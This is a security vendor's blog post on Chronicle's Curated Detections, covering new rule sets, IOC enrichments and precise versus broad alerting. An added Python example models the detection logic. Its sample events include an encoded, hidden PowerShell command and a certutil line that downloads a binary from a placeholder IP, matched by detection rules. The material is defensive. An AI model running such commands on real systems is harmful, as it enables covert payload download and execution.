A Look Back at Curated Detections

Chronicle's Curated Detections is a powerful capability that can help you identify and respond to security threats. In August 2022, we released our initial set of curated detections to identify a variety of threats facing our customers.

If you have yet to explore the curated content, Curated Detections are collections of rules grouped together to cover specific threats. Since the initial release, we have continued to develop new rule sets that cover even more threats and have introduced a set of new, powerful features that let customers build their own detections. In this post, we discuss some of the detections we have added since the initial launch.

New Curated Detections

The following new curated detection rule sets are available:

Windows Centric:

  • Anomalous-Powershell - Detects PowerShell commands containing obfuscation techniques or other anomalous behavior.

  • Security-Downgrade - Detects behavior that impairs or disables common security tooling or detection capabilities.

  • Living-off-the-Land - Detects anomalous usage of tools native to Windows operating systems that can be abused by threat actors for malicious purposes.

Google Cloud Centric:

  • Admin-Action - Activity associated with Google Cloud administrative actions, deemed suspicious but potentially legitimate depending on organizational use.

  • IAM-abuse - Activity associated with suspicious Google Cloud IAM permissions or roles.

  • Resource-Masquerading - Activity masqueraded to appear as legitimate default resources or services in Google Cloud.

  • Suspicious-Infrastructure-Change - Activity involving modifications of infrastructure in Google Cloud.

  • Suspicious-Behavior - Activity that could be considered suspicious in some Google Cloud environments.

  • Service-Disruption - Activity that may indicate a Google Cloud service disruption has occurred.

  • Hacktools - Activity associated with known Offensive Security frameworks and/or Google Cloud-oriented hacktools.

  • Cloud SQL Ransom - Activity associated with threat actors ransoming Google Cloud SQL assets.

New IOC Enrichment within Chronicle

Additionally, we have been working on data enrichment to make customer-generated content more actionable. Previously, customers had to normalize, enrich, and post-process this data on their own. With built-in enrichment of entity and event data, security teams can build powerful and actionable alerting at the detection level, using the enriched fields to amplify or dampen relevant threat detection signals. Some examples of enrichments we have developed include:

  • GeoIP - Use country, state, ASN, carrier name, DNS, and organization name in your alerting.

  • Safe Browsing - Use Google's Safe Browsing reputation service to help determine whether a file is malicious.

  • WHOIS - Add WHOIS data to your alerting to find potential phishing or masquerading domains.

  • Google Cloud Threat Intelligence (GCTI) - Use Google's threat intelligence to find Tor exit nodes, or to identify binaries that Google has deemed benign.

  • VirusTotal Metadata and Relationship Metadata - Use VirusTotal metadata that includes file compilation timestamps, digital signatures, entropy, and extracted network indicators (to name just a few of the available fields).

How to use Curated Content

To enable Curated Detections, Chronicle offers a set of quick actions that apply the recommended rule settings. Alternatively, you can open each rule pack and configure each set individually. Both options are available in the Curated Detections tab under Rules.

When you click on a rule set, you have settings for both precise and broad rules. Precise rules find malicious behavior with a high degree of confidence and few false positives. Broad rules find behavior that could potentially be malicious or anomalous, but typically produce more false positives.

Alerting can be switched on for precise rules, broad rules, both, or neither. When alerting is on, each detection is placed in a queue for an analyst. Merely activating a rule without alerting runs it in the background, so the results can be analyzed and tuned using exclusions before the rule is added to your security operations processes.

To view the performance of curated detections, click Dashboard to see which rules have fired, and adjust the settings as needed.
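The following Python model, added here as an illustration and not Chronicle's own code or YARA-L, shows how the two ideas described above fit together: an enrichment step (a constructed GeoIP table standing in for the feeds listed earlier) feeds a tiered rule set, where precise rules alert by default, broad rules run in the background until tuned, and exclusions are applied before anything reaches the analyst queue. All event field names, IP addresses, user names, and rule names are constructed for this example.

```python
"""Toy model of tiered (precise/broad) detections with enrichment and exclusions.

Added example only: field names, the GeoIP table, and the events are constructed
and do not correspond to Chronicle UDM fields or curated rule content.
"""
import ipaddress
from dataclasses import dataclass
from typing import Callable, Dict, List

# Constructed GeoIP lookup table standing in for a real GeoIP enrichment feed.
GEOIP_TABLE: Dict[str, dict] = {
    "203.0.113.7": {"country": "XX", "asn": 64500, "org": "Example Hosting"},
    "198.51.100.9": {"country": "YY", "asn": 64501, "org": "Example ISP"},
}

# Constructed definition of "internal" address space for this environment.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed sample events (field names belong to this example, not to UDM).
SAMPLE_EVENTS: List[dict] = [
    {"id": 1, "process": "powershell.exe", "user": "alice", "src_ip": "203.0.113.7",
     "cmdline": "powershell.exe -nop -w hidden -enc <base64>"},
    {"id": 2, "process": "powershell.exe", "user": "svc_backup", "src_ip": "10.0.0.5",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"id": 3, "process": "powershell.exe", "user": "svc_deploy", "src_ip": "10.0.0.6",
     "cmdline": "powershell.exe -enc <base64>"},
    {"id": 4, "process": "certutil.exe", "user": "bob", "src_ip": "198.51.100.9",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.9/x.bin"},
]


def enrich(event: dict, table: Dict[str, dict] = GEOIP_TABLE) -> dict:
    """Attach a 'geo' block (internal flag plus any GeoIP data) to a copy of the event."""
    out = dict(event)
    ip = ipaddress.ip_address(event["src_ip"])
    internal = any(ip in net for net in INTERNAL_NETS)
    out["geo"] = {"internal": internal, **table.get(event["src_ip"], {})}
    return out


@dataclass(frozen=True)
class Rule:
    name: str
    tier: str                      # "precise" or "broad"
    match: Callable[[dict], bool]  # evaluated on the enriched event


def _encoded_powershell(e: dict) -> bool:
    return e["process"] == "powershell.exe" and "-enc" in e["cmdline"].lower()


# A precise rule stacks several signals (including the enrichment); broad rules fire on one.
RULES: List[Rule] = [
    Rule("ps_encoded_hidden_external", "precise",
         lambda e: _encoded_powershell(e) and "-w hidden" in e["cmdline"]
         and not e["geo"]["internal"]),
    Rule("ps_encoded_any", "broad", _encoded_powershell),
    Rule("lolbin_certutil_download", "broad",
         lambda e: e["process"] == "certutil.exe" and "-urlcache" in e["cmdline"]),
]


@dataclass(frozen=True)
class RuleSetConfig:
    """Per-rule-set settings: which tiers alert, and tuning exclusions."""
    alert_precise: bool = True
    alert_broad: bool = False          # activated, but runs in the background
    excluded_users: frozenset = frozenset()


@dataclass(frozen=True)
class Detection:
    rule: str
    tier: str
    event_id: int
    alerted: bool


def evaluate(events: List[dict], rules: List[Rule] = RULES,
             config: RuleSetConfig = RuleSetConfig()) -> List[Detection]:
    """Enrich each event, apply exclusions, then run every rule and record whether it alerts."""
    detections: List[Detection] = []
    for raw in events:
        e = enrich(raw)
        if e["user"] in config.excluded_users:
            continue  # tuning exclusion: dropped before any rule can raise an alert
        for rule in rules:
            if rule.match(e):
                alerted = config.alert_precise if rule.tier == "precise" else config.alert_broad
                detections.append(Detection(rule.name, rule.tier, e["id"], alerted))
    return detections


def alert_queue(detections: List[Detection]) -> List[Detection]:
    """Only detections with alerting switched on reach the analyst queue."""
    return [d for d in detections if d.alerted]


if __name__ == "__main__":
    dets = evaluate(SAMPLE_EVENTS)
    for d in dets:
        print(f"event {d.event_id}: {d.rule} [{d.tier}] -> {'ALERT' if d.alerted else 'background'}")
```

With the default configuration, only the precise rule reaches the analyst queue; the broad hits on the internal service account and the certutil download stay in the background, which is where the exclusion for `svc_deploy` would be tuned in before alerting on the broad tier is switched on.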

What’s Next?

We plan to continue providing a quarterly update featuring some of the exciting work the Google Cloud Threat Intelligence (GCTI) team has been building into Curated Detections. We are also excited to be partnering with Mandiant on an upcoming rule set targeting the frontline threats Mandiant observes. In addition, we are working on more enrichments, including a remote access tooling feed that identifies remote access tools operating in customer environments, so customers can alert on or exclude any remote access tooling they observe.
